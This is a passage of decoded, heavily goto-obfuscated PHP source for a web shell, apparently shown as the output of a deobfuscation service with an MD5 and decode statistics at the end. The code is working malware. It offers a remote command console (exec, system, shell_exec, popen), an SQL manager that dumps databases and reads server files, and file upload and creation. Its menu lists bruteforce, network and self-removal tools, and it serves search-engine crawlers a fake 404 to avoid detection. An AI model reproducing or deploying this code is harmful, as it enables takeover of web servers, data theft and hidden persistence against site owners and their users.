'selected'; } goto A443b; e9bce: if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { goto C82b2; E2041: if (!($item = $db->fetch())) { goto a0a2a; } goto ff49f; ff49f: list($key, $value) = each($item); goto f7d49; cefb6: c5360: goto B7e08; f7d49: echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>'; goto fe6aa; ed8f6: C1e9a: goto cefb6; b4812: a0a2a: goto E192a; fe6aa: goto ee8fe; goto b4812; b6c01: echo "<select name=sql_base><option value=''></option>"; goto Af305; C82b2: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto c5360; case "UTF-8": $db->setCharset('utf8'); goto c5360; case "KOI8-R": $db->setCharset('koi8r'); goto c5360; case "KOI8-U": $db->setCharset('koi8u'); goto c5360; case "cp866": $db->setCharset('cp866'); goto c5360; } goto ed8f6; E192a: echo '</select>'; goto F8974; Af305: ee8fe: goto E2041; B7e08: $db->listDbs(); goto b6c01; F8974: } else { echo $tmp; } } else { echo $tmp; } goto Ab2db; A443b: echo ">MySql</option><option value='pgsql' "; goto Fab9b; F141c: if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') { goto a27fa; e70c3: f6989: goto ff06d; F8992: $db->selectdb($_POST['sql_base']); goto B044d; A9a1e: cf17a: goto e70c3; a27fa: $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto F8992; ff06d: if (empty($_POST['file'])) { goto Ac708; E894a: exit; goto Ecb21; B3f10: header("Content-Type: text/plain"); goto D22be; D22be: foreach ($_POST['tbl'] as $v) { $db->dump($v); B3aab: } goto Bd25e; Fa22b: header("Content-Disposition: attachment; filename=dump.sql"); goto B3f10; Bd25e: b1fae: goto E894a; Ac708: ob_start("ob_gzhandler", 4096); goto Fa22b; Ecb21: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto cea68; C8699: unset($_POST['p2']); goto d7f57; ed636: fda1d: goto A7d23; cea68: foreach ($_POST['tbl'] as $v) { $db->dump($v, $fp); A3813: } goto ed636; A7d23: fclose($fp); goto C8699; d7f57: } else { die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } goto Eab5b; B044d: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto f6989; case "UTF-8": $db->setCharset('utf8'); goto f6989; case "KOI8-R": $db->setCharset('koi8r'); goto f6989; case "KOI8-U": $db->setCharset('koi8u'); goto f6989; case "cp866": $db->setCharset('cp866'); goto f6989; } goto A9a1e; Eab5b: } goto f6861; d56a6: echo '</div>'; goto ab2db; Ab2db: echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db='" . @addslashes($_POST['sql_base']) . "';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>"; goto c2bbb; c2bbb: if (isset($db) && $db->link) { goto D857b; C5ede: if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto F94ff; F94ff: if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto f517a; e6438: echo "</table></form><br/>"; goto C5ede; D857b: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto c3477; c3477: if (!empty($_POST['sql_base'])) { goto C99f8; a57e2: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto D2765; Fe241: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto D4dc3; e7536: Bd81c: goto A4805; F2940: echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto B26ad; B26ad: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto Eff6b; F856e: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto Aead7; A4805: if (!($item = $db->fetch($tbls_res))) { goto F0dd3; } goto B4b04; f8446: F0dd3: goto e5d66; e5d66: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto e6351; f018e: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto Abb63; e5642: $line = $line == 1 ? 2 : 1; goto D9902; e239f: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto E5fe7; D9902: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } fd092: } goto a10e0; D2067: echo '</table>'; goto A24c6; b1890: if (!($item = $db->fetch())) { goto a67a9; } goto b5fbd; f41bd: echo '</tr>'; goto C2bfa; a10e0: Dab8e: goto f41bd; f4f04: b17e9: goto b1890; E5fe7: $line = 1; goto f4f04; Ff42d: a67a9: goto D2067; C2bfa: goto b17e9; goto Ff42d; Abb63: $title = false; goto e239f; Ccc40: echo '<tr class="l' . $line . '">'; goto e5642; b5fbd: if (!$title) { goto Dda67; Dda67: echo '<tr>'; goto F8e65; b30e1: reset($item); goto B251f; ff081: $line = 2; goto Acb1e; adcd7: d4fb3: goto b30e1; A1c44: echo '</tr><tr>'; goto ff081; F8e65: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; cac77: } goto adcd7; B251f: $title = true; goto A1c44; Acb1e: } goto Ccc40; A24c6: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto F2940; B4b04: list($key, $value) = each($item); goto F856e; C99f8: $db->selectdb($_POST['sql_base']); goto Fe241; D2765: goto Bd81c; goto f8446; d54d8: echo "</td></tr>"; goto a72e3; e6351: if (@$_POST['p1'] == 'select') { goto Dc061; c3e6e: echo " of {$pages}"; goto c60f5; b9ca0: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>"; } goto ebed0; E51d7: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto e182b; Dc061: $_POST['p1'] = 'query'; goto E93be; e182b: $num = $db->fetch(); goto e9edd; e9edd: $pages = ceil($num['n'] / 30); goto ea659; E93be: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto E51d7; b9a4d: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto Acdd3; c60f5: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>"; } goto b9ca0; Acdd3: echo "<br><br>"; goto Afe72; ebed0: $_POST['p3']--; goto b9a4d; ea659: echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto c3e6e; Afe72: } goto f018e; Eff6b: echo "</textarea><br/><input type=submit value='Execute'>"; goto d54d8; D4dc3: $tbls_res = $db->listTables(); goto e7536; Aead7: $value = htmlspecialchars($value); goto a57e2; a72e3: } goto e6438; f517a: } else { echo htmlspecialchars($db->error()); } goto d56a6; De129: $db = new DbClass($_POST['type']); goto F141c; ab2db: nWfzhFooter(); goto Ac562; f6861: nWfzhHeader(); goto E69ae; Ac562: } goto C2e1c; E5efa: if ($cwd[strlen($cwd) - 1] != '/') { $cwd .= '/'; } goto E3398; E3386: if (empty($_POST['a'])) { if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a'] = $default_action; } else { $_POST['a'] = 'SecInfo'; } } goto f29b6; Dc03e: function nWfzhEx($in) { goto Ac9f5; Ac9f5: $out = ''; goto dc72c; dc72c: if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { goto Ad49b; c3035: @passthru($in); goto Fd7bf; Fd7bf: $out = ob_get_clean(); goto a2702; Ad49b: ob_start(); goto c3035; a2702: } elseif (function_exists('system')) { goto D7eac; E738a: @system($in); goto D6893; D6893: $out = ob_get_clean(); goto e6499; D7eac: ob_start(); goto E738a; e6499: } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { goto a4235; bd8fc: goto F3463; goto Bffa3; Dc462: pclose($f); goto D82d5; d87fe: if (@feof($f)) { goto Da5f6; } goto Fc4ce; a3189: F3463: goto d87fe; a4235: $out = ""; goto a3189; Fc4ce: $out .= fread($f, 1024); goto bd8fc; Bffa3: Da5f6: goto Dc462; D82d5: } goto fee4e; fee4e: return $out; goto Fc9a3; Fc9a3: } goto Bc7b6; a7383: $cwd = @getcwd(); goto Ad0da; Eb763: if (!$safe_mode) { error_reporting(0); } goto cfad7; Ad0da: if ($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } goto E5efa; D12f4: function nWfzhPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' . nWfzhPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font color=white>' . nWfzhPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' . nWfzhPerms(@fileperms($f)) . '</font>'; } } goto fda81; c8a09: function actionConsole() { goto Cd0ea; C9673: bc81a: goto e0421; c7565: foreach ($GLOBALS['aliases'] as $n => $v) { goto C82e9; C82e9: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto A6424; } goto B179d; B179d: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto ab3f9; ab3f9: A6424: goto a72a6; a72a6: } goto C9673; E17c6: echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; goto abf7a; fe751: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; goto c7565; abf7a: echo '</form></div><script>d.cf.cmd.focus();</script>'; goto Ce426; e0421: echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; goto Ffc02; c6098: nWfzhHeader(); goto f7395; Ce426: nWfzhFooter(); goto d8d38; Fdf11: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto c6098; f7395: echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>"; goto fe751; c909d: if (isset($_POST['ajax'])) { goto d4f9c; E89ab: ob_start(); goto A820d; d4f9c: nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto E89ab; b6063: exit; goto b74fe; E8dd4: echo strlen($temp), "\n", $temp; goto b6063; cc19f: $temp = ob_get_clean(); goto E8dd4; c8f9b: echo "d.cf.output.value+='" . $temp . "';"; goto C7d7b; E4acf: if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) { if (@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto c8f9b; A820d: echo "d.cf.cmd.value='';\n"; goto de112; de112: $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . nWfzhEx($_POST['p1']), "\n\r\t\\'\0")); goto E4acf; C7d7b: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto cc19f; b74fe: } goto Fdf11; Ffc02: if (!empty($_POST['p1'])) { echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . nWfzhEx($_POST['p1'])); } goto E17c6; Cd0ea: if (!empty($_POST['p1']) && !empty($_POST['p2'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif (!empty($_POST['p1'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0); } goto c909d; d8d38: } goto e0c19; A8b79: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto a7383; e0c19: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } goto bfd72; a45bc: if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function posix_getpwuid($p) { return false; } } goto d61c6; Db647: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto F7c7f; ca1d9: error_reporting(0); goto D7cf8; ca726: function nWfzhHeader() { goto acb76; c6ccb: $opt_charsets = ''; goto Cd90c; B5fed: $n = count($path); goto ac94c; aefcf: b140d: goto F7bd0; b3a8e: $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto Dd20d; E8423: if (!($j <= $i)) { goto e453f; } goto ed9e3; ab0c1: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script>\r\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>"; goto E951b; E46d0: goto d8b21; goto e00d9; ac94c: $i = 0; goto ed80c; A7b42: $menu = ''; goto F6a31; e8fbd: if (!function_exists('posix_getegid')) { goto ae87b; ae87b: $user = @get_current_user(); goto a2ca8; a2ca8: $uid = @getmyuid(); goto Bbee3; cf5a7: $group = "?"; goto A8426; Bbee3: $gid = @getmygid(); goto cf5a7; A8426: } else { goto e34ba; e34ba: $uid = @posix_getpwuid(posix_geteuid()); goto c79e0; a6262: $gid = $gid['gid']; goto dba1d; Df6e6: $group = $gid['name']; goto a6262; b541f: $user = $uid['name']; goto A16aa; A16aa: $uid = $uid['uid']; goto Df6e6; c79e0: $gid = @posix_getgrgid(posix_getegid()); goto b541f; dba1d: } goto cd9e5; B218b: $kernel = @php_uname('s'); goto d3d7c; b137c: $cwd_links .= "\")'>" . $path[$i] . "/</a>"; goto Eaf5c; ed80c: d8b21: goto Cb288; e2940: if (strpos('Linux', $kernel) !== false) { $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto e8fbd; e6354: $drives = ""; goto fede2; F7bd0: $j++; goto ae114; d3d7c: $explink = ''; goto e2940; A4dea: $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); goto c6ccb; ed9e3: $cwd_links .= $path[$j] . '/'; goto aefcf; d861d: $i++; goto E46d0; F9d10: e453f: goto b137c; ff5ae: global $color; goto ab0c1; Baa2f: $m['Self remove'] = 'SelfRemove'; goto A7b42; F6a31: foreach ($m as $k => $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; Ab8e0: } goto C98ec; C98ec: Aace3: goto e6354; acb76: if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['default_charset']; } goto ff5ae; a0239: $j = 0; goto Bd509; Bd509: e7a3f: goto E8423; A3944: $path = explode("/", $GLOBALS['cwd']); goto B5fed; Cb288: if (!($i < $n - 1)) { goto f1a65; } goto Cf74a; ae114: goto e7a3f; goto F9d10; C6036: $totalSpace = $totalSpace ? $totalSpace : 1; goto adb32; e00d9: f1a65: goto A4dea; Ad355: echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . nWfzhViewSize($totalSpace) . ' <span>Free:</span> ' . nWfzhViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . nWfzhPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; goto e74f9; Cf74a: $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; goto a0239; fede2: if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } ac046: } A53e4: } goto Ad355; E951b: $freeSpace = @diskfreespace($GLOBALS['cwd']); goto E3d9d; Dd20d: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto Baa2f; cd9e5: $cwd_links = ''; goto A3944; Cd90c: foreach ($charsets as $item) { $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>'; d9f35: } goto ec8d9; Eaf5c: fd352: goto d861d; adb32: $release = @php_uname('r'); goto B218b; ec8d9: Ecfbe: goto b3a8e; E3d9d: $totalSpace = @disk_total_space($GLOBALS['cwd']); goto C6036; e74f9: } goto F3652; f5f32: $color = "#df5"; goto B37cf; e8a7a: @ini_set('max_execution_time', 0); goto a18f7; E3398: if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax; } goto C8433; F3652: function nWfzhFooter() { $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t<tr>\r\n\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\r\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>\r\n\t</tr></table></div></body></html>"; } goto a45bc; a0955: exit;Function Calls
| None |
Stats
| MD5 | c2eff2d620f0ba7e12312d1749698fb2 |
| Eval Count | 0 |
| Decode Time | 109 ms |